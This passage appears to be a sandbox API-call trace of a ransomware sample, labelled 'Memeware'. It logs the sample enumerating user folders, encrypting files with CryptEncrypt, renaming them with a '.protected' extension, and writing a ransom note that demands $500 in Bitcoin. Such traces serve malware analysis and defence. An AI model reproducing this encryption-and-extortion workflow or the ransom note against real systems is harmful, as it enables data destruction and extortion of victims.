1 [0092.595] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x132e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x132e, lpOverlapped=0x0) returned 1 [0092.596] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.596] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.596] 
WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.596] CloseHandle (hObject=0xb4) returned 1 [0092.596] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif.protected") returned 77 [0092.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y9wcyg5aklhtpdf6b92d.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y9WcYG5aKLHTpDF6b92d.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y9wcyg5aklhtpdf6b92d.gif.protected")) returned 1 [0092.597] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.597] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.597] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RESTORE_FILES.txt") returned 60 [0092.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.597] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.597] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.598] lstrlenA (lpString="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") returned 684 [0092.598] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.598] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.598] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0092.598] CloseHandle (hObject=0xa4) returned 1 [0092.598] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="Windows") returned -1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="Program Files") returned -1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="Program Files (x86)") returned -1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="$Recycle.bin") returned 1 [0092.598] lstrcmpiW (lpString1="PrintHood", lpString2="System Volume Information") returned -1 [0092.598] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned 43 [0092.598] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0092.598] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0092.598] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*") returned 45 [0092.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.599] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="Windows") returned -1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="Program Files") returned 1 [0092.599] lstrcmpiW (lpString1="Recent", 
lpString2="Program Files (x86)") returned 1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="$Recycle.bin") returned 1 [0092.599] lstrcmpiW (lpString1="Recent", lpString2="System Volume Information") returned -1 [0092.599] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned 40 [0092.599] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0092.599] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0092.599] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*") returned 42 [0092.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.599] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="Windows") returned -1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="Program Files") returned 1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="Program Files (x86)") returned 1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="$Recycle.bin") returned 1 [0092.599] lstrcmpiW (lpString1="Saved Games", lpString2="System Volume Information") returned -1 [0092.599] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned 45 [0092.599] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0092.599] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0092.599] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*") returned 47 [0092.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x295f190 | out: 
lpFindFileData=0x295f190) returned 0x47b990 [0092.600] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.600] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.600] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.600] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.600] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.600] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\.") returned 47 [0092.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.600] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.600] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.600] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.600] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.600] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.600] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.600] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.600] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.600] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.600] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.600] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\..") returned 48 [0092.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.600] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.600] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.600] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.600] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.601] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.601] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.601] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0092.601] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.601] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.601] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0092.602] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.602] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0092.602] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0092.602] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.602] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0092.602] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.602] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0092.602] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.602] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.603] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.603] CloseHandle (hObject=0xb4) returned 1 [0092.603] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.protected") returned 67 [0092.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.protected")) returned 1 [0092.606] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.606] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.606] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\RESTORE_FILES.txt") returned 63 [0092.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.607] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.607] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.608] lstrlenA (lpString="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") returned 684 [0092.608] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.608] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.608] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0092.608] CloseHandle (hObject=0xa4) returned 1 [0092.608] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="Windows") returned -1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="Program Files") returned 1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="Program Files (x86)") returned 1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="$Recycle.bin") returned 1 [0092.608] lstrcmpiW (lpString1="Searches", lpString2="System Volume Information") returned -1 [0092.608] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 42 [0092.608] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0092.608] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0092.608] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*") returned 44 [0092.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.608] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.608] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.608] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.609] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.609] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\.") returned 44 [0092.609] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.609] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.609] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned 
-1 [0092.609] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.609] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.609] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.609] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.609] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.609] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.609] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.609] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\..") returned 45 [0092.609] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.609] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.609] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.609] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.609] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.609] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.609] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.609] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0092.609] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.610] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0092.610] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Searches\\desktop.ini") returned 54 [0092.610] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0092.610] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.610] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x20c, lpOverlapped=0x0) returned 1 [0092.611] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.611] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x20c, lpOverlapped=0x0) returned 1 [0092.611] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.611] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.611] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.611] CloseHandle (hObject=0xb4) returned 1 [0092.611] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.protected") returned 64 [0092.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 